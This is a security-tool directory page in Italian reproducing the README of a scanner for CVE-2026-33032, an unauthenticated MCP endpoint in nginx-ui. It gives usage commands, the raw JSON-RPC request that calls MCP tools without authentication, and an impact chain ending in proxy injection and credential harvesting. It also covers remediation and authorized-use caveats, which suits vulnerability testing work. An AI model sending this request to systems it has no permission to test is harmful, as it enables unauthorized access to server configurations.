Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-33032-scanner — Scanner di vulnerabilità non distruttivo per il bypass dell'autenticazione dell'endpoint MCP di Nginx-UI (CVE-2026-33032) | Kitploit
Strumenti/GitHubGitHub/twinson333/cve-2026-33032-scanner
Scanner di VulnerabilitàExploitSicurezza WebPenetration TestingAutenticazioneSicurezza delle API
GitHubtwinson333/cve-2026-33032-scanner

cve-2026-33032-scanner

Scanner di vulnerabilità non distruttivo per il bypass dell'autenticazione dell'endpoint MCP di Nginx-UI (CVE-2026-33032)

Vedi Repository
324 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner CVE-2026-33032

Scanner di vulnerabilità non distruttivo per il bypass dell'autenticazione dell'endpoint MCP di Nginx-UI

Panoramica della Vulnerabilità

CVE-2026-33032 è una vulnerabilità di bypass dell'autenticazione nell'integrazione Model Context Protocol (MCP) di nginx-ui. L'endpoint /mcp_message non dispone di middleware di autenticazione pur fornendo accesso a tutti gli strumenti MCP, consentendo a utenti remoti di:

  • Leggere le configurazioni e lo stato di nginx
  • Creare/modificare/eliminare file di configurazione nginx
  • Riavviare o ricaricare il servizio nginx
  • Esfiltrare dati di configurazione sensibili
  • Iniettare configurazioni dannose per l'intercettazione del traffico

Causa Principale

  1. Asimmetria di Autenticazione: L'endpoint /mcp richiede autenticazione, ma /mcp_message no:

    root@kitploit:~
    r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
    r.Any("/mcp_message", middleware.IPWhiteList(), ...)  // AuthRequired() mancante
    
  • Whitelist IP Fail-Open: La whitelist IP predefinita è vuota, e il middleware la tratta come "consenti tutto"

  • Entrambi gli Endpoint Condividono l'Handler: Entrambi instradano allo stesso mcp.ServeHTTP() che elabora tutte le invocazioni degli strumenti MCP

  • Funzionalità dello Scanner

    ✅ Test non distruttivo - Utilizza solo strumenti MCP di sola lettura
    ✅ Fingerprinting completo - Identifica le installazioni di nginx-ui
    ✅ Proof-of-concept sicuro - Nessuna modifica alla configurazione
    ✅ Scansione batch - Elabora più target da file
    ✅ Report dettagliati - Output JSON per l'integrazione

    Installazione

    root@kitploit:~
    # Clona o scarica lo scanner
    git clone https://github.com/Twinson333/cve-2026-33032-scanner.git
    cd cve-2026-33032
    chmod +x cve-2026-33032-scanner.py
    
    # Installa le dipendenze (se necessario)
    pip3 install requests
    

    Utilizzo

    Scansione di Base

    root@kitploit:~
    # Scansiona un singolo target
    python3 cve-2026-33032-scanner.py -u http://target.com:9000
    
    # Scansione con output verboso
    python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v
    
    # Timeout personalizzato
    python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15
    

    Scansione Batch

    root@kitploit:~
    # Scansiona più target da file
    python3 cve-2026-33032-scanner.py -f targets.txt
    
    # Con output verboso e report JSON
    python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json
    
    #Burp Pingback
    python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net
    

    Formato del File dei Target

    root@kitploit:~
    # targets.txt - un URL per riga
    http://192.168.1.100:9000
    https://nginx-ui.corp.com
    http://10.0.0.50:9000
    

    Come Funziona

    Lo scanner esegue un processo di rilevamento in più fasi:

    Fase 1: Fingerprinting

    Verifica gli endpoint comuni di nginx-ui per identificare l'installazione:

    • /api/info - Informazioni sulla versione
    • /login - Pagina di accesso
    • /api/auth/login - Endpoint di autenticazione
    • /mcp e /mcp_message - Endpoint MCP

    Fase 2: Verifica dell'Autenticazione

    Testa l'endpoint /mcp per verificare che richieda correttamente l'autenticazione (baseline)

    Fase 3: Sfruttamento della Vulnerabilità

    Tenta chiamate agli strumenti MCP non distruttive tramite /mcp_message SENZA autenticazione:

    1. nginx_status (il più sicuro) - Legge lo stato del processo nginx
    2. nginx_config_list - Elenca i file di configurazione
    3. nginx_config_base_path - Ottiene il percorso della directory di configurazione

    Se uno qualsiasi degli strumenti riesce senza autenticazione, la vulnerabilità è confermata.

    Strumenti MCP Sicuri Utilizzati

    Lo scanner invoca solo strumenti MCP di sola lettura:

    StrumentoDescrizioneImpatto
    nginx_statusLegge lo stato del servizio nginxNessuna modifica
    nginx_config_listElenca i file di configurazioneNessuna modifica
    nginx_config_base_pathOttiene il percorso della directory di configurazioneNessuna modifica

    Strumenti esplicitamente evitati:

    • nginx_config_add - Creerebbe file
    • nginx_config_modify - Altererebbe le configurazioni
    • restart_nginx / reload_nginx - Interruzione del servizio
    • nginx_config_enable - Modificherebbe le configurazioni attive

    Esempi di Output

    Target Vulnerabile

    root@kitploit:~
    [+] nginx-ui rilevato: Trovato 'nginx-ui' in /login
    [+] Endpoint /mcp correttamente protetto
    
    [*] Test dell'endpoint /mcp_message (CVE-2026-33032)...
      [*] Tentativo con strumento: nginx_status - Legge lo stato di nginx (il più sicuro)
          Stato: 200
    
    ======================================================================
    [!] VULNERABILE a CVE-2026-33032
    ======================================================================
    Prova: nginx_status eseguito con successo senza autenticazione
    

    Target Protetto

    root@kitploit:~
    [+] nginx-ui rilevato: Endpoint versione accessibile
    [+] Endpoint /mcp correttamente protetto
    
    [*] Test dell'endpoint /mcp_message (CVE-2026-33032)...
      [*] Tentativo con strumento: nginx_status - Legge lo stato di nginx (il più sicuro)
          Stato: 401
          Autenticazione richiesta (protetto) ✓
    
    [+] NON vulnerabile - l'endpoint richiede autenticazione
    

    Rimedio

    Se la vulnerabilità è confermata:

    1. Correzione Immediata: Aggiungere il middleware di autenticazione a /mcp_message:

      root@kitploit:~
      r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
          func(c *gin.Context) {
              mcp.ServeHTTP(c)
          })
      
    2. Difesa in Profondità:

      • Configurare la whitelist IP per negare tutto per impostazione predefinita
      • Limitare gli endpoint MCP al solo localhost se l'accesso esterno non è necessario
      • Implementare il rate limiting sugli endpoint MCP
    3. Aggiornamento: Passare alla versione patchata di nginx-ui quando disponibile

    Divulgazione Responsabile

    Questo strumento è progettato per:

    • ✅ Programmi di bug bounty
    • ✅ Test di penetrazione autorizzati
    • ✅ Ricerca sulla sicurezza con permesso
    • ✅ Validazione delle vulnerabilità prima della divulgazione

    NON utilizzare questo strumento su sistemi che non possiedi o per cui non hai esplicito permesso di test.

    Suggerimenti per il Bug Bounty

    Quando segnali questa vulnerabilità:

    1. Gravità: Critica (CVSS 9.8+)

      • Accessibile dalla rete
      • Nessuna autenticazione richiesta
      • Compromissione completa del sistema
      • Esfiltrazione + modifica della configurazione
    2. Prova: Includi l'output dello scanner che mostra l'invocazione riuscita di uno strumento MCP senza autenticazione

    3. Catena di Impatto:

      • Accesso non autenticato → Lettura configurazione → Topologia backend rivelata
      • Scrittura configurazione → Iniezione proxy dannoso → Raccolta credenziali
      • Riavvio nginx → Interruzione del servizio → DoS
    4. PoC Sicuro: Utilizza solo gli strumenti di sola lettura (nginx_status, nginx_config_list)

    Dettagli Tecnici

    Formato di Invocazione degli Strumenti MCP

    root@kitploit:~
    POST /mcp_message HTTP/1.1
    Content-Type: application/json
    
    {
      "jsonrpc": "2.0",
      "method": "tools/call",
      "params": {
        "name": "nginx_status",
        "arguments": {}
      },
      "id": 1
    }
    

    Risposta di Successo

    root@kitploit:~
    {
      "jsonrpc": "2.0",
      "result": {
        "content": [
          {
            "type": "text",
            "text": "nginx è in esecuzione (PID: 1234)"
          }
        ]
      },
      "id": 1
    }
    

    Risposta Protetta

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {
      "error": "autenticazione richiesta"
    }
    

    Riferimenti

    • CVE: CVE-2026-33032
    • Interessati: nginx-ui (versioni con integrazione MCP)
    • CVSS: 9.8 (Critica)
    • CWE: CWE-306 (Autenticazione Mancante per Funzione Critica)

    Licenza

    Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati.

    Autore

    Antony Esthak Twinson @ Cyber Tamarin
    Ricercatore di Sicurezza | Cacciatore di Bug Bounty
    Specializzato in Sicurezza delle Applicazioni Web e Ricerca sulle Vulnerabilità


    Disclaimer: Questo scanner esegue solo test non distruttivi. Ottieni sempre la dovuta autorizzazione prima di testare qualsiasi sistema.

    Scarica lo strumento